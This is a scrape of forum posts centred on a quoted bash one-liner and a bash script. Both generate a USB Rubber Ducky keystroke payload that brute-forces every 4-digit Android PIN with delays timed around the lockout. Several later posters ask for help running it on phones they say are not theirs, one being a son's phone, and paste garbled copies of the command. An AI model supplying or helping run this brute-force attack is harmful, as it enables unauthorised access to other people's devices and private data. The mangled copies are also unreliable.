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Thanks man
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I understand.. It is my Sons phone.... Just trying to make sure he is alright.... Thanks for the input!
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There are plenty of posts on hacking phones... Just trying to get some more information. Mine isn't the only one out there. Thanks for the reply
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I've tried every code and haven't had any luck hacking into this note5 phone. Anyone have any suggestions. No I don't want to data reset the phone.. its not mine..lol... Anyone have any in sight... I only have the duck encoder to create the bin file... need in this phone....
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On 12/6/2012 at 5:31 PM, Darren Kitchen said:
I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE]
So how do I use this code on your duck tool kit.com site?
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8 minutes ago, lilfear1 said:
Not sure what I'm doing..LOL... Can you assist me in correcting this?
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On 6/30/2017 at 0:15 PM, b0N3z said:
as per Darren about 166hrs
Im on the duck tool kit and I can't see to get the script to work. any insight?
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On 11/20/2014 at 9:28 AM, 411Hall said:
Hi mate, yeah no worries. Send me the .txt, .bin and .ps1 file and i will have a look. It might also be worth launching the PowerShell.exe on your Windows box, navigating to the .ps1 file and attempting to run it from command line. That will show you if there any errors when it attempts to run.
I will be away for the weekend btw so wont be able to look until Monday.
Cheers,
411.
Hello 411,
I'm new at this trying to crack a phone password with this and I'm on the duck tool kit. But what am I doing wrong. It says does not recognize echo....help..:) thank you for any assistance
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/
WAIT/g' | gsed '0~1 s/$/
DELAY 1000
ENTER
ENTER/g' | gsed '0~5 s/WAIT/DELAY 5000
ENTER
DELAY 5000
ENTER
DELAY 5000
ENTER
DELAY 5000
ENTER/g' >> android_brute-force_0000-9999.txtecho DELAY 5000 > android_brute-force_0000-9999.txt; e
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So I'm on ducktoolkit.com. What am I doing wrong that this doesn't work. Thank you for the help
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/
WAIT/g' | gsed '0~1 s/$/
DELAY 1000
ENTER
ENTER/g' | gsed '0~5 s/WAIT/DELAY 5000
ENTER
DELAY 5000
ENTER
DELAY 5000
ENTER
DELAY 5000
ENTER/g' >> android_brute-force_0000-9999.txtecho DELAY 5000 > android_brute-force_0000-9999.txt; e
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On 12/6/2012 at 7:38 PM, Darren Kitchen said:
No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.
For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.
On 12/6/2012 at 5:31 PM, Darren Kitchen said:I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE]
Im in duck tool kit.com and trying to use this script but it doesn't work. What am I doing wrong?
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On 12/12/2012 at 5:36 PM, keb0x80 said:
I created a script to generate pretty much the same output using only bash loops/conditions
#!/bin/bash count=0 echo "DELAY 5000" for pin in {0000..9999} do count=$((count+1)) echo "STRING $pin" # After every other pin, do this if [ $((count % 2)) -eq 0 ]; then echo "DELAY 1000" echo "ENTER" echo "ENTER" fi # After 5 pins, do this if [ $((count % 5)) -eq 0 ]; then for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) )) do echo "DELAY 5000" echo "ENTER" done fi done [/CODE]
I'm on the duck tool kit.com and when I put this is the encoder it rejects it as "does not recognize !in bash. What am I doing wrong?
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Thank you. I appreciate it
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THhank you so much. Yes, I googled it. But just looking for a little more clarification. Didn't ask for a hand out just some understanding!
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I ordered the rubber ducky. How do I program it to hack a phone pin. Does it come pre loaded with the program. Is it quick.
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Thanks guys!